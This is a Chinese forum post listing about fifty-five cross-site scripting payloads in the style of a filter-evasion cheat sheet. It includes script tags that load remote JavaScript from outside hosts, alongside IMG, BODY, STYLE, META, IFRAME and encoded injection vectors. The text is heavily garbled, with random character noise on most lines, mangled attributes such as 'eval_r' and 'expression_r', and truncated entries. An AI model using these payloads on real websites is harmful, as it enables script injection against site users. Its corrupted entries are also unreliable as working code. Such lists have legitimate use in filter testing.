(1)普通的XSS JavaScript注入' y$ j. g" [+ s5 N5 [
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT># L3 o' c# W4 U, z
(99)另类弹框
! {& v( q* Y0 V' J, Y<q/oncut=alert()>15 \2 U. H6 ~5 a# n5 C5 ^
<s/onclick=alert()>b
% ~& y, N5 e) O; ` <XSS=" onclick="alert(1)//">clickme</SSX=">' U! @$ [& @, R! c" L3 I1 i5 }, X5 S
<zzz onclick=alert`1`>clickme</zzz>
; R% K1 y$ S F6 g <a onclick=alert`1`>clickme</a>1 A. v8 J0 e( v3 k
<a=">clickme</a=">
* A) x9 K, c! p- h9 S<a=">clickme</a>; i! N+ F! x. V, s) a Z
<z=">clickme</z=">
+ h) J+ o4 G! B/ b: Y- {- h<z onclick=alert`1`>clickme</z>
% f) ]2 _8 u' ` R, ^7 f: ~/ h* v) q# |2 |1 N' }' y4 @
(2)IMG标签XSS使用JavaScript命令4 j$ C3 F$ x6 ~- E+ C6 M6 y2 D
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>' T! O- b) v7 h/ ]' ^( `! k) U
3 P7 X8 i! ?: x9 R f(3)IMG标签无分号无引号& O( {" L0 z( [: x* s |
<IMG SRC=javascript:alert(‘XSS’)>
7 L- V( h6 K: c- i* A9 \$ j8 P4 O
1 _9 y0 s ?. c7 N+ h9 }! W(4)IMG标签大小写不敏感
+ J! e j6 X! F; L' g<IMG SRC=JaVaScRiPt:alert(‘XSS’)>3 C4 V$ v) M9 z- f5 c8 N
, k" M' Z$ c$ t
(5)HTML编码(必须有分号)
5 {9 R6 b1 k! d" w) O2 O<IMG SRC=javascript:alert(“XSS”)>5 C" Z- z9 W4 N
0 [: s- u% J3 D/ V
(6)修正缺陷IMG标签
' b! c. ~5 k5 x% @2 `+ z<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>9 |" E& |; A, F2 N( Q# T# z
6 S; ^+ w- L" M0 p: v2 t5 [(7)formCharCode标签(计算器)5 G/ I3 c* @; N5 w9 D
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>5 n6 G E8 u% a- F* Q# q
' c! i7 r7 q, X) X7 B4 q
(8)UTF-8的Unicode编码(计算器)% d" E q* w6 j: Z \0 s( K
<IMG SRC=jav..省略..S')>, @9 g8 M, O9 q& `- m' V) A& }
9 i2 u* C9 [4 P- F0 T4 {( m(9)7位的UTF-8的Unicode编码是没有分号的(计算器)" Q8 A! e4 y2 |1 Y; r3 `
<IMG SRC=jav..省略..S')>
& @# A3 o0 W" |. `, f( n# { {0 X( n* t' O) L
(10)十六进制编码也是没有分号(计算器)% N6 e: S& \2 _9 y! E* v. V m9 {8 w
<IMG SRC=\'#\'" /span>
6 ~% [7 U4 O% P- J( w+ ?' X2 w2 E) b% J- ~. A' O7 ? w
(11)嵌入式标签,将Javascript分开
8 q, x2 A: C6 t. w<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>' T( e9 _7 x2 _$ `
/ F x- }: @4 a( S+ l(12)嵌入式编码标签,将Javascript分开
: {6 Z) Q# T5 y( l: X<IMG SRC=\'#\'" ascript:alert(‘XSS’);”> T0 w9 N& q' b" }7 c' B2 h4 n# W( }
, ?6 c/ R, [1 p8 H(13)嵌入式换行符& y. |; X( {0 F
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>' N( H# y5 r8 ]& Z& z. U% n
T2 B+ `. F) H. z
(14)嵌入式回车( E: ~( J% B% I- |3 ]1 s. U6 I) {
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>* w8 ?$ F2 U1 Y) `& C$ ^
3 `; U0 t/ h6 n2 w @(15)嵌入式多行注入JavaScript,这是XSS极端的例子
7 ]- U2 ~$ T' z, V, c: Z1 A, t5 D<IMG SRC=\'#\'" /span>
2 o, ~6 r, b6 r! z* V% K7 Q* k: U2 z! B0 z8 {8 t5 c9 x
(16)解决限制字符(要求同页面)
; P( b" l: z7 i* U<script>z=’document.’</script>0 g, n" q. r+ s$ w
<script>z=z+’write(“‘</script>, p8 z4 O- o$ L
<script>z=z+’<script’</script>' y" w/ k( l9 S
<script>z=z+’ src=ht’</script>
3 S; t. r7 M1 `<script>z=z+’tp://ww’</script>
: ^4 e/ a; x& l* v' I8 y; O& M<script>z=z+’w.shell’</script>/ `0 o6 F$ r; ?# T* n; z3 @7 Q! Z
<script>z=z+’.net/1.’</script>
; R# B/ ?' A; U! P G<script>z=z+’js></sc’</script>
( f/ [# a, L( G- \% {) B. r<script>z=z+’ript>”)’</script>, e: t! Y5 `" K
<script>eval_r(z)</script>" w! Q b+ f8 }6 D2 ?
5 ^) g' N& ]; R y5 v3 U(17)空字符4 b4 H# m9 j3 w- v0 S5 r$ U& q7 u
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out4 ~; Q0 A! u" F+ C5 k4 S' K
& d$ Y, L; n6 D6 `1 Y5 e! g
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用8 s, R: K. M3 w
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out0 ]9 R4 K! B. R# ?6 K
' z5 F2 ]5 U% X
(19)Spaces和meta前的IMG标签5 I4 R# b3 w& f' j
<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>6 v- U' e4 F7 k1 O# R+ n% m- i
8 z( L5 t' F4 L7 d
(20)Non-alpha-non-digit XSS
+ W% t! X J9 t2 A6 W. W% l& V<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>% C7 T- c3 t$ f9 }4 n
" e/ l x- v& C# g/ h( z
(21)Non-alpha-non-digit XSS to 2 K5 K+ t2 |' G# w) M. a S
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>3 A" ~+ I, A* w
, e0 P7 L% v& | F! }5 t- b
(22)Non-alpha-non-digit XSS to 33 H* J n9 }% k
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>$ ^" O; @. s$ E. y$ T
; i$ g+ e$ A, H7 n(23)双开括号
1 \$ }* t1 Q1 y5 q9 F<<SCRIPT>alert(“XSS”);//<</SCRIPT>, n8 S$ K; U" H1 u
8 {0 V% p" A: {% k3 G) N) P(24)无结束脚本标记(仅火狐等浏览器)
, ` Z$ S: ?+ k: G& J<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
: g; ], s6 f& ?7 v, G
k/ z, t# P- w$ M r. u; H(25)无结束脚本标记2" U# h. A( Z6 c+ u6 I2 x
<SCRIPT SRC=//3w.org/XSS/xss.js>
3 h2 R+ t7 @7 D( q$ c+ T6 h* T' Q2 h3 {" C! T% A6 b. R: i
(26)半开的HTML/JavaScript XSS8 @# Q1 S* ^, x5 F
<IMG SRC=\'#\'" /span>
" H; J5 o; `% @, d D: H3 Q. P
: n2 w' p: w; G: {# @( x1 s. G(27)双开角括号" A7 F9 K1 ^( i) ~* F: E
<iframe src=http://3w.org/XSS.html <
4 A: v. _/ D7 @
9 G @! D! M: p, m(28)无单引号 双引号 分号
: v4 Y" w+ m4 o6 H7 C5 f. x g<SCRIPT>a=/XSS/; g. Q$ F7 |& i \) M' T& y t
alert(a.source)</SCRIPT>% Q, t4 a$ G! G- T& D
$ l4 V& I# ^) h; G' m5 _6 p- ^
(29)换码过滤的JavaScript
# ?; @- f: x9 Z\”;alert(‘XSS’);//
9 D8 s3 R( E8 z) W5 T2 ]8 _7 h0 c( g2 P4 t1 U! q$ h# a
(30)结束Title标签
: U& H. G: X- g</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>6 F1 Y1 U& D" ^/ J& m
1 Y% Z# x5 }( `6 i
(31)Input Image% X8 h8 U7 o; t: P2 D( }
<INPUT SRC=\'#\'" /span>6 Z+ Y/ \4 i) O* r$ f4 J) G
6 m. {3 M' ]/ {- X; U- f- Y8 v" U& w
(32)BODY Image
" F% M" A' x& A- Y' m6 I# ~<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
4 c$ u) t g3 d
; t# T; \$ N1 G& ^! n(33)BODY标签
/ h$ y1 X# g x# A<BODY(‘XSS’)>! w O6 ~( u! `, E( Q" `
4 |! j3 O" f" i; J$ m
(34)IMG Dynsrc" U. A3 y5 _; J/ e. m$ d6 w/ l
<IMG DYNSRC=\'#\'" /span># o6 x: t9 I9 N
. w L' C0 }; G: ](35)IMG Lowsrc
5 l( e* k9 \, X2 p" i; L<IMG LOWSRC=\'#\'" /span>
+ h8 R; P- L+ \9 U. d8 @7 U' q+ t9 R$ z, ?" }8 B3 W
(36)BGSOUND
% Z# u, _% W! W. {* |9 L0 c- M<BGSOUND SRC=\'#\'" /span>
/ E, U3 }. P2 t0 W- z$ ]: \
- X* n/ t3 r! h: }0 K: `(37)STYLE sheet+ |, G: b1 ]/ E2 s, A
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
: c4 o1 u% y" r( r* X* _' a! W5 F v& ]" [9 a
(38)远程样式表& q1 `0 _1 y, P k6 V5 ? c \9 [
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>3 x/ z" o/ C2 Z1 M
$ _ s8 U, j! m; ?( h) q5 Q5 s
(39)List-style-image(列表式)
' r G- d$ s$ L' F$ {<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS( Y7 t/ u' F+ D0 C
3 k' v9 ~+ d1 C(40)IMG VBscript
( O& M! x( `# l+ I# O1 b9 F$ e7 M<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
1 n7 }! n$ z1 n& w v- U, ]0 Z' w* ^6 j. a- d3 T
(41)META链接url
6 b3 } ?% t0 L ]2 v2 Y5 z, F<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>8 n7 h$ [7 v" j% k3 L! M
. f6 T% X7 B2 M' i, S: Q% o+ G
(42)Iframe
5 r* v* q8 g. d2 V$ L<IFRAME SRC=\'#\'" /IFRAME>" k9 T0 ?6 g6 X8 D$ {0 H7 |
4 p; e3 d/ d [1 B. b(43)Frame
' X( k2 X1 x3 s) a+ [ c7 L& U<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
l8 R/ r; b& m! z3 Y9 k6 \" _7 D) O; v* f/ Y; v! n0 x; e
(44)Table
) k1 p, D& F0 b/ f8 z+ i- M<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
( J) E% H* y) ~4 v. P3 h# o2 s3 M1 G; r
(45)TD
$ l+ P9 i3 w; D, b+ _<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
5 t7 s4 [- c# Q- M, w5 b- [* F- y0 E
7 D5 U7 B! o* K(46)DIV background-image
& Q' }& q; y2 d) N<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
- F7 i2 U$ M. t( P7 z8 L6 \( P. u8 p7 t% i4 R$ Q$ m9 X2 L: U
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
3 a( @5 L8 i( U; b! X# J<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>2 R4 c: x" j) G- _9 d& ~
r |; E/ O' o2 R: t1 k(48)DIV expression
% f' {5 z3 ~# A9 J1 p% @<DIV STYLE=”width: expression_r(alert(‘XSS’));”>& Y5 R6 k4 i/ ~9 N* ^, d8 j
+ |& A, b1 D8 {& F: a(49)STYLE属性分拆表达
& L1 s2 Q3 b* \<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
4 I- l7 X# I( w" r8 B, r
8 i/ ]: n5 ~$ a7 _% X8 f(50)匿名STYLE(组成:开角号和一个字母开头); \! _, O/ N1 M' ?7 K
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>$ M6 S: k: J6 Z
7 i6 f: N& d; X1 k# [
(51)STYLE background-image% V& ^+ j! H0 ?- H) M/ \
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>( H$ e U- z4 [
* o1 l6 d" a7 @, M" Q(52)IMG STYLE方式: j! T, T: @" p5 T; a
exppression(alert(“XSS”))’>
+ o ~+ P: Q* t7 k* Z+ z- x' i- N4 T& A" Y0 a7 M5 N, n
(53)STYLE background
J, ?1 V* q, V6 e9 ~; U<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>: Y0 h* p4 H, U6 K; @
5 L7 O( t1 [, H$ _(54)BASE
0 c# |0 b9 U0 A8 u<BASE HREF=”javascript:alert(‘XSS’);//”>
9 B! Y7 N1 }0 T; s0 T. U# o+ U, h. `
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS$ q0 P% n/ }: e. j2 c% r
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
, u5 a4 a7 J: |4 k |
发表于 2016-4-28 10:06:15
收藏
支持
反对